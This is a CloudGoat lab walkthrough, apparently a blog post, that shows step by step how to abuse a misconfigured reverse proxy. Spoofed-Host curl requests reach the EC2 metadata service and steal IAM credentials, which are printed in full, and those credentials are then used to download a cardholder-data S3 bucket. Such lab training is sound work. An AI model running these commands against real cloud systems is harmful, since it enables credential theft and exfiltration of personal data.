[Offensive security] Let’s steal the confidential files from the misconfigured S3 bucket.
What we will do in this article
1: setup an initial environment using Docker
2: steal the confidential files from the misconfigured S3 bucket.
overview
Starting as an anonymous outsider with no access or privileges, exploit a misconfigured reverse-proxy server to query the EC2 metadata service and acquire instance profile keys. Then, use those keys to discover, access, and exfiltrate sensitive data from an S3 bucket.
1: setup an initial environment using Docker
please see how to set up an initial environment here.
Scenario: cloud_breach_s3
The IP Address of an EC2 server that is running a misconfigured reverse proxy
Command: $ ./cloudgoat.py create cloud_breach_s3
Scenario Goal
Download the confidential files from the S3 bucket.
What we know now
cloudgoat_output_aws_account_id = "362364726861"
cloudgoat_output_target_ec2_server_ip = "54.166.247.74"
DEMO
curl http://54.166.247.74
first, lets see what kind of information I can get
<h1>This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again.</h1>bash-5.1#
Based on the information we get, let’s modify the request’s ‘host’ header!
bash-5.1# curl http://54.166.247.74 -H 'Host:169.254.169.254'
1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
2019-10-01
2020-10-27
2021-01-03
2021-03-23
2021-07-15
Let’s query EC2 metadata service
bash-5.1# curl http://54.166.247.74/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'
cg-banking-WAF-Role-cgid3qq26zlbnkbash-5.1#
We can get IAM role name now
Let’s get credentials based on this role.
bash-5.1# curl http://54.166.247.74/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cgid3qq26zlbnk -H 'Host:169.254.169.254'{
"Code" : "Success",
"LastUpdated" : "2022-01-17T20:26:57Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIAVIXU65ZGWME5OYV3",
"SecretAccessKey" : "FBONy6v+wJatW3akJodEX3D1I1txstAlnLIJbdCd",
"Token" : "IQoJb3JpZ2luX2VjEK3//////////wEaCXVzLWVhc3QtMSJHMEUCIETZRIuKV4k3FwBtOljx7ZkO/wbgub6zFDlCVlRpyJRqAiEAxJe9zYCizyRgWe7k++V2Sd08P8/LzngysPfzVtdQLJAqgwQIxv//////////ARAAGgwzNjIzNjQ3MjY4NjEiDKaDQQ5lh/+OwODvcSrXA8xo7tQ/5AMDZg/2LO6Y0DFsz87CW50rOXdwAE4Iv1wuCIAvw7ejWOP4FUdPLdaBiF9/MJqALVsyPnj1pdkF0aCUNmNqbq04PWVtvCf7nSm0/AzrdgWinHkqzuMbmr9LViZ38oR7foZGLsD1A795vF6SUF6RdKYE7/4FeeQa8BWNaRGIt5EqViOjpeJdt7Z8lUqeUjhsrW8asrdOA38E9x59x9M1yU+BSqwkcObNnKdTZ8wMkG//axps1t6E5knyeDaRCKavNS8Zt2omNrvMWSKxS6tYKoMhwP/+cNeW8qdg2pRH3Ye5Zls0w2Rj9K7Fb8hYRSmxcSxlozlEidxP06HmfCOf57i6i1+S7g0pQ8lig2h/iULPsiW2RgyJtMmSg3epPXhxCPw0S9IKKJ9LRIeeiNh9BkD5rImXLjNuz2Sa5Ycs1Hq0+wimoNf3vOktWwO2L+R40+Utms6/C25fMhOn4ZiNeJryNO8tZIpb5kGxr1pLPpKI2eZIhkT7ElVIkGP9ZQiAE6Xmv/qSXDLso4aQU9DLWjUkgulGytZM9dQJ9n3OF6ZOTR/SR7g1aM5ia5qVeCVnLloQfrGL7lI3m9LXu4EL7YCT0FixosFzHXxp3m77u3MEBzC0opePBjqlAeQ/2FiLQQMAOJTEZXY7+lVgCIiC45GQY/s4roJ8ZcBT23r56YtyQGSufICoj9fxIQNlDkk/ASRcRGXgjtB2v5qk35jV220kb3X7ub+leexre8/euiXzEy/4hpIueQHnFgROK6x9ox8Ihy3XAuf+63ybQFAZseAHHQ+7ZVPqedyyERNWvwEHvCw6jDImd9jQXXMkFXHVCiZEXYmqL93Oju5Tf8sAxQ==",
"Expiration" : "2022-01-18T03:02:32Z"
}bash-5.1#
Specially-crafted CURL command is successful, returning the Access Key ID, Secret Access Key, and Session Token of the IAM Instance Profile attached to the EC2 instance.
Lets exploit the stolen credentials
bash-5.1# aws configure --profile hackerAWS Access Key ID [None]: ASIAVIXU65ZGWME5OYV3
AWS Secret Access Key [None]: FBONy6v+wJatW3akJodEX3D1I1txstAlnLIJbdCd
Default region name [None]:
Default output format [None]: bash-5.1# vi ~/.aws/credentialsaws_session_token = IQoJb3JpZ2luX2VjEK3//////////wEaCXVzLWVhc3QtMSJHMEUCIETZRIuKV4k3FwBtOljx7ZkO/wbgub6zFDlCVlRpyJRqAiEAxJe9zYCizyRgWe7k++V2Sd08P8/LzngysPfzVtdQLJAqgwQIxv//////////ARAAGgwzNjIzNjQ3MjY4NjEiDKaDQQ5lh/+OwODvcSrXA8xo7tQ/5AMDZg/2LO6Y0DFsz87CW50rOXdwAE4Iv1wuCIAvw7ejWOP4FUdPLdaBiF9/MJqALVsyPnj1pdkF0aCUNmNqbq04PWVtvCf7nSm0/AzrdgWinHkqzuMbmr9LViZ38oR7foZGLsD1A795vF6SUF6RdKYE7/4FeeQa8BWNaRGIt5EqViOjpeJdt7Z8lUqeUjhsrW8asrdOA38E9x59x9M1yU+BSqwkcObNnKdTZ8wMkG//axps1t6E5knyeDaRCKavNS8Zt2omNrvMWSKxS6tYKoMhwP/+cNeW8qdg2pRH3Ye5Zls0w2Rj9K7Fb8hYRSmxcSxlozlEidxP06HmfCOf57i6i1+S7g0pQ8lig2h/iULPsiW2RgyJtMmSg3epPXhxCPw0S9IKKJ9LRIeeiNh9BkD5rImXLjNuz2Sa5Ycs1Hq0+wimoNf3vOktWwO2L+R40+Utms6/C25fMhOn4ZiNeJryNO8tZIpb5kGxr1pLPpKI2eZIhkT7ElVIkGP9ZQiAE6Xmv/qSXDLso4aQU9DLWjUkgulGytZM9dQJ9n3OF6ZOTR/SR7g1aM5ia5qVeCVnLloQfrGL7lI3m9LXu4EL7YCT0FixosFzHXxp3m77u3MEBzC0opePBjqlAeQ/2FiLQQMAOJTEZXY7+lVgCIiC45GQY/s4roJ8ZcBT23r56YtyQGSufICoj9fxIQNlDkk/ASRcRGXgjtB2v5qk35jV220kb3X7ub+leexre8/euiXzEy/4hpIueQHnFgROK6x9ox8Ihy3XAuf+63ybQFAZseAHHQ+7ZVPqedyyERNWvwEHvCw6jDImd9jQXXMkFXHVCiZEXYmqL93Oju5Tf8sAxQ==
With the IAM role’s credentials in hand, we are now able to explore the victim’s cloud environment using the powerful permissions granted to the role.
bash-5.1# aws s3 ls --profile hacker
2022-01-17 20:26:55 cg-cardholder-data-bucket-cgid3qq26zlbnk
Now we can list the s3 buckets
bash-5.1# aws s3 sync s3://cg-cardholder-data-bucket-cgid3qq26zlbnk . --profile hacker
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholder_data_primary.csv to ./cardholder_data_primary.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholder_data_secondary.csv to ./cardholder_data_secondary.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholders_corporate.csv to ./cardholders_corporate.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/goat.png to ./goat.png
We downloaded the credentials from the misconfigured s3 buckets.
bash-5.1# cat cardholder_data_primary.csv
ssn,id,first_name,last_name,email,gender,ip_address,address,city,state,zip
287-43-8531,1,Coo
Yes, we did it!!
Cleanup
bash-5.1# ./cloudgoat.py destroy cloud_breach_s3